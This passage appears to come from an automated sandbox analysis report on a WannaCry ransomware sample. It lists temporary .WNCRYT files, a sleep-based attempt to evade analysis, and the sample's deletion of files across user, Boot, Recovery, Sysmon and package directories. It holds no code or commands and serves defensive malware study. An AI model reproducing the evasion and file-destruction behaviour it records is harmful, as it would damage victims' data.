file: C:\Users\user\AppData\Local\Temp\85.WNCRYT
file: C:\Users\user\AppData\Local\Temp\86.WNCRYT
file: C:\Users\user\AppData\Local\Temp\87.WNCRYT
file: C:\Users\user\AppData\Local\Temp\88.WNCRYT
file: C:\Users\user\AppData\Local\Temp\89.WNCRYT
file: C:\Users\user\AppData\Local\Temp\9.WNCRYT
file: C:\Users\user\AppData\Local\Temp\90.WNCRYT
file: C:\Users\user\AppData\Local\Temp\91.WNCRYT
file: C:\Users\user\AppData\Local\Temp\92.WNCRYT
file: C:\Users\user\AppData\Local\Temp\93.WNCRYT
file: C:\Users\user\AppData\Local\Temp\94.WNCRYT
file: C:\Users\user\AppData\Local\Temp\95.WNCRYT
file: C:\Users\user\AppData\Local\Temp\96.WNCRYT
file: C:\Users\user\AppData\Local\Temp\97.WNCRYT
file: C:\Users\user\AppData\Local\Temp\98.WNCRYT
file: C:\Users\user\AppData\Local\Temp\99.WNCRYT
file: C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT
file: C:\Users\user\AppData\Local\Temp\397.WNCRYT
file: C:\Users\user\AppData\Local\Temp\398.WNCRYT
file: C:\Users\user\AppData\Local\Temp\402.WNCRYT
file: C:\Users\user\AppData\Local\Temp\403.WNCRYT
file: C:\Users\user\AppData\Local\Temp\405.WNCRYT
file: C:\Users\user\AppData\Local\Temp\407.WNCRYT
file: C:\Users\user\AppData\Local\Temp\408.WNCRYT
file: C:\Users\user\AppData\Local\Temp\409.WNCRYT
file: C:\Users\user\AppData\Local\Temp\454.WNCRYT
file: C:\Users\user\AppData\Local\Temp\455.WNCRYT
file: C:\Users\user\AppData\Local\Temp\456.WNCRYT
file: C:\Users\user\AppData\Local\Temp\518.WNCRYT
file: C:\Users\user\AppData\Local\Temp\519.WNCRYT
file: C:\Users\user\AppData\Local\Temp\520.WNCRYT
file: C:\Users\user\AppData\Local\Temp\521.WNCRYT
file: C:\Users\user\AppData\Local\Temp\78.WNCRYT
file: C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT
file: C:\Users\user\AppData\Local\Temp\397.WNCRYT
file: C:\Users\user\AppData\Local\Temp\398.WNCRYT
file: C:\Users\user\AppData\Local\Temp\402.WNCRYT
file: C:\Users\user\AppData\Local\Temp\403.WNCRYT
file: C:\Users\user\AppData\Local\Temp\405.WNCRYT
file: C:\Users\user\AppData\Local\Temp\407.WNCRYT
file: C:\Users\user\AppData\Local\Temp\408.WNCRYT
file: C:\Users\user\AppData\Local\Temp\409.WNCRYT
file: C:\Users\user\AppData\Local\Temp\454.WNCRYT
file: C:\Users\user\AppData\Local\Temp\455.WNCRYT
file: C:\Users\user\AppData\Local\Temp\456.WNCRYT
file: C:\Users\user\AppData\Local\Temp\518.WNCRYT
file: C:\Users\user\AppData\Local\Temp\519.WNCRYT
file: C:\Users\user\AppData\Local\Temp\520.WNCRYT
file: C:\Users\user\AppData\Local\Temp\521.WNCRYT
file: C:\Users\user\AppData\Local\Temp\78.WNCRYT
file: C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT
file: C:\Users\user\AppData\Local\Temp\397.WNCRYT
file: C:\Users\user\AppData\Local\Temp\398.WNCRYT
file: C:\Users\user\AppData\Local\Temp\402.WNCRYT
file: C:\Users\user\AppData\Local\Temp\403.WNCRYT
file: C:\Users\user\AppData\Local\Temp\405.WNCRYT
file: C:\Users\user\AppData\Local\Temp\407.WNCRYT
file: C:\Users\user\AppData\Local\Temp\408.WNCRYT
file: C:\Users\user\AppData\Local\Temp\409.WNCRYT
file: C:\Users\user\AppData\Local\Temp\454.WNCRYT
file: C:\Users\user\AppData\Local\Temp\78.WNCRYT
file: C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT
A process attempted to delay the analysis task.
note: wannacry.exe tried to sleep 1039.55 seconds, actually delayed analysis time by 0.0 seconds
Deletes files from disk
DeletedFile: C:\Users\user\AppData\Local\Temp\00000000.res
DeletedFile: C:\Users\user\Desktop\~SD7362.tmp
DeletedFile: C:\Users\user\Documents\~SD73C1.tmp
DeletedFile: C:\Users\user\Documents\WindowsPowerShell\~SD73E1.tmp
DeletedFile: C:\Users\Default\Desktop\~SD73F2.tmp
DeletedFile: C:\Users\Default User\Desktop\~SD7412.tmp
DeletedFile: C:\Users\Public\Desktop\~SD7432.tmp
DeletedFile: C:\Users\Default\Documents\~SD7443.tmp
DeletedFile: C:\Users\Default User\Documents\~SD7454.tmp
DeletedFile: C:\Users\Public\Documents\~SD7464.tmp
DeletedFile: C:\~SD7475.tmp
DeletedFile: C:\$Recycle.Bin\~SD7486.tmp
DeletedFile: C:\$Recycle.Bin\S-1-5-21-1249488040-416823385-3057894055-500\~SD74A6.tmp
DeletedFile: C:\$Recycle.Bin\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD74B6.tmp
DeletedFile: C:\$Recycle.Bin\S-1-5-21-3047202784-114954003-3208681637-500\~SD74D7.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\~SD74E7.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1025\~SD7508.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1025\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1028\~SD7566.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1028\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1029\~SD7596.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1029\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1030\~SD75B6.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1030\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1031\~SD75E6.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1031\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1032\~SD7616.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1032\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1033\~SD7627.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1033\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1035\~SD7637.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1035\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1036\~SD7638.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1036\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1037\~SD7649.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1037\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1038\~SD765A.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1038\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1040\~SD767A.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1040\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1041\~SD767B.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1041\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1042\~SD767C.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1042\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1043\~SD768D.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1043\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1044\~SD768E.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1044\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1045\~SD769E.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1045\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1046\~SD76BE.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1046\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1049\~SD76CF.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1049\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1053\~SD76E0.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1053\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\1055\~SD771F.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\1055\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\2052\~SD776E.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\2052\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\2070\~SD77DD.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\2070\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\3082\~SD781C.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\3082\eula.rtf.WNCRYT
DeletedFile: C:\ba69bdf0a250e352360c33\Graphics\~SD783C.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\NetFx45\~SD783D.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\NetFx451\~SD783E.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\NetFx452\~SD784F.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\NetFx46\~SD7850.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\NetFx461\~SD7851.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\NetFx462\~SD7862.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\NetFx47\~SD7863.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\NetFx471\~SD7864.tmp
DeletedFile: C:\ba69bdf0a250e352360c33\NetFx472\~SD7865.tmp
DeletedFile: C:\Boot\~SD7866.tmp
DeletedFile: C:\Boot\cs-CZ\~SD7867.tmp
DeletedFile: C:\Boot\da-DK\~SD7868.tmp
DeletedFile: C:\Boot\de-DE\~SD7869.tmp
DeletedFile: C:\Boot\el-GR\~SD786A.tmp
DeletedFile: C:\Boot\en-US\~SD787A.tmp
DeletedFile: C:\Boot\es-ES\~SD787B.tmp
DeletedFile: C:\Boot\fi-FI\~SD787C.tmp
DeletedFile: C:\Boot\Fonts\~SD787D.tmp
DeletedFile: C:\Boot\fr-FR\~SD787E.tmp
DeletedFile: C:\Boot\hu-HU\~SD787F.tmp
DeletedFile: C:\Boot\it-IT\~SD7880.tmp
DeletedFile: C:\Boot\ja-JP\~SD7881.tmp
DeletedFile: C:\Boot\ko-KR\~SD7882.tmp
DeletedFile: C:\Boot\nb-NO\~SD7893.tmp
DeletedFile: C:\Boot\nl-NL\~SD7894.tmp
DeletedFile: C:\Boot\pl-PL\~SD7895.tmp
DeletedFile: C:\Boot\pt-BR\~SD7896.tmp
DeletedFile: C:\Boot\pt-PT\~SD7897.tmp
DeletedFile: C:\Boot\ru-RU\~SD7898.tmp
DeletedFile: C:\Boot\sv-SE\~SD7899.tmp
DeletedFile: C:\Boot\tr-TR\~SD78AA.tmp
DeletedFile: C:\Boot\zh-CN\~SD78AB.tmp
DeletedFile: C:\Boot\zh-HK\~SD78AC.tmp
DeletedFile: C:\Boot\zh-TW\~SD78AD.tmp
DeletedFile: C:\PerfLogs\~SD78AE.tmp
DeletedFile: C:\PerfLogs\Admin\~SD78AF.tmp
DeletedFile: C:\PSTranscripts\~SD78B0.tmp
DeletedFile: C:\PSTranscripts\20251206\~SD78B1.tmp
DeletedFile: C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.fPMufFfM.20251206093923.txt.WNCRYT
DeletedFile: C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.S6TbHpZ5.20251206094405.txt.WNCRYT
DeletedFile: C:\Recovery\~SD78C1.tmp
DeletedFile: C:\Recovery\a2711f19-5f87-11ed-b233-de933b2797ae\~SD78C2.tmp
DeletedFile: C:\Sysmon\~SD78C3.tmp
DeletedFile: C:\Sysmon\sysmonconfig.txt.WNCRYT
DeletedFile: C:\Users\~SD78D4.tmp
DeletedFile: C:\Users\All Users\~SD78D5.tmp
DeletedFile: C:\Users\All Users\Adobe\~SD78D6.tmp
DeletedFile: C:\Users\All Users\Adobe\ARM\~SD78D7.tmp
DeletedFile: C:\Users\All Users\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\~SD78E7.tmp
DeletedFile: C:\Users\All Users\Adobe\Setup\~SD78F8.tmp
DeletedFile: C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\~SD78F9.tmp
DeletedFile: C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\~SD78FA.tmp
DeletedFile: C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\RDC\Transforms\~SD78FB.tmp
DeletedFile: C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\Transforms\~SD790C.tmp
DeletedFile: C:\Users\All Users\Boxstarter\~SD790D.tmp
DeletedFile: C:\Users\All Users\Boxstarter\LICENSE.txt.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\~SD790E.tmp
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\~SD790F.tmp
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\~SD791F.tmp
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\~SD7920.tmp
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\~SD7941.tmp
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\~SD7942.tmp
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRYT
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\~SD7943.tmp
DeletedFile: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\~SD7953.tmp
DeletedFile: C:\Users\All Users\Boxstarter\BuildPackages\~SD7954.tmp
DeletedFile: C:\Users\All Users\chocolatey\~SD7955.tmp
DeletedFile: C:\Users\All Users\chocolatey\CREDITS.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\~SD7966.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\7zip.22.1\~SD7976.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\7zip.install.22.1\~SD7977.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\adobereader.2022.003.20263\~SD7978.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\autohotkey.install.1.1.35.00\~SD7979.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\boxstarter.3.0.0\~SD797A.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\boxstarter.bootstrapper.3.0.0\~SD797B.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\boxstarter.chocolatey.3.0.0\~SD797C.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.Common.3.0.0\~SD798D.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\Boxstarter.HyperV.3.0.0\~SD798E.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\BoxStarter.WinConfig.3.0.0\~SD798F.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\chocolatey-compatibility.extension.1.0.0\~SD7990.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\chocolatey-core.extension.1.4.0\~SD79A1.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\chocolatey-dotnetfx.extension.1.0.1\~SD79A2.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\chocolatey-windowsupdate.extension.1.0.5\~SD79A3.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\dotnet-5.0-runtime.5.0.13\~SD79A4.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\dotnet-6.0-runtime.6.0.1\~SD79B4.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.5.0.13\~SD79B5.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\dotnet-runtime.6.0.1\~SD79B6.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\dotnet.5.0.13\~SD79B7.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\dotnet.6.0.1\~SD79B8.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\dotnetfx.4.8.0.20190930\~SD79B9.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\Firefox.106.0.5\~SD79CA.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\GoogleChrome.107.0.5304.88\~SD79CB.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\jre8.8.0.351\~SD79CC.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\KB2919355.1.0.20160915\~SD79CD.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\KB2919442.1.0.20160915\~SD79CE.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\KB2999226.1.0.20181019\~SD79CF.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\KB3033929.1.0.5\~SD79D0.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\KB3035131.1.0.3\~SD79D1.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\KB3063858.1.0.0\~SD79D2.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\KB3118401.1.0.5\~SD79D3.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\OfficeProPlus2013.15.0.4827\~SD79E4.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\openjdk.19.0.1\~SD79E5.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\powershell-core.7.3.0-rc1\~SD79E6.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\python3.3.8.10\~SD79E7.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\tapwindows.9.24.2\~SD79E8.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\vcredist140.14.32.31332\~SD79E9.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\vcredist2005.8.0.50727.619501\~SD79EA.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\vcredist2008.9.0.30729.616104\~SD79EB.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\vcredist2015.14.0.24215.20170201\~SD79EC.tmp
DeletedFile: C:\Users\All Users\chocolatey\.chocolatey\winrar.6.11.0.20220504\~SD79FC.tmp
DeletedFile: C:\Users\All Users\chocolatey\bin\~SD79FD.tmp
DeletedFile: C:\Users\All Users\chocolatey\config\~SD79FE.tmp
DeletedFile: C:\Users\All Users\chocolatey\extensions\~SD79FF.tmp
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\~SD7A00.tmp
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\~SD7A01.tmp
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\~SD7A02.tmp
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\~SD7A13.tmp
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\~SD7A14.tmp
DeletedFile: C:\Users\All Users\chocolatey\helpers\~SD7A15.tmp
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\~SD7A16.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\~SD7A65.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\7zip\~SD7A76.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\7zip.install\~SD7A86.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\7zip.install\legal\~SD7A87.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\7zip.install\legal\LICENSE.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\7zip.install\tools\~SD7A98.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\autohotkey.install\~SD7A99.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\~SD7AA9.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\license.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\VERIFICATION.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter\~SD7ABA.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter\tools\~SD7ABB.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\~SD7ABC.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\~SD7ABD.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\LICENSE.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\~SD7ABE.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\~SD7ABF.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\~SD7AFF.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\~SD7B0F.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\LICENSE.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\~SD7B3F.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\~SD7B5F.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\~SD7C2B.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\~SD7C9A.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\LICENSE.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\~SD7D18.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\~SD7D19.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\~SD7D97.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\~SD7DF6.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\LICENSE.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\~SD7E83.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\~SD7ED2.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\~SD7EF3.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\LICENSE.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\~SD7F71.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey\~SD7FA0.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\~SD7FD0.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\~SD7FF1.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\~SD805F.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\~SD80AE.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\~SD80FD.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\~SD814C.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\~SD817C.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\~SD81CB.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\~SD820B.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnet\~SD822B.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\~SD828A.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\~SD82AA.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\~SD82EA.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\~SD830A.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnet-runtime\~SD831A.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnetfx\~SD832B.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnetfx\tools\~SD832C.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\Firefox\~SD833D.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\Firefox\tools\~SD834D.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\Firefox\tools\LanguageChecksums.csv.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\GoogleChrome\~SD83AC.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\~SD83DC.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\jre8\~SD843B.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\jre8\tools\~SD847A.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\KB2919355\~SD84E9.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\KB2919355\tools\~SD8538.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\KB2919442\~SD8539.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\KB2919442\tools\~SD853A.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\KB2999226\~SD8589.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\KB2999226\tools\~SD85B9.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3033929\~SD8627.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3033929\Tools\~SD8686.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3035131\~SD86D5.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3035131\Tools\~SD86F5.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3063858\~SD8735.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3063858\Tools\~SD8765.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3118401\~SD87B4.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3118401\Tools\~SD87E4.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\~SD87E5.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\~SD87F5.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\openjdk\~SD8806.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\openjdk\openjdk-19.0.1_windows-x64_bin.zip.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\openjdk\tools\~SD8884.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\powershell-core\~SD8894.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\powershell-core\tools\~SD88B5.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\powershell-core\tools\ThirdPartyNotices.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\python3\~SD8904.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\python3\legal\~SD8914.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\python3\legal\LICENSE.txt.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\python3\tools\~SD8944.tmp
DeletedFile: C:\Users\All Users\chocolatey\lib\tapwindows\~SD8955.tmp
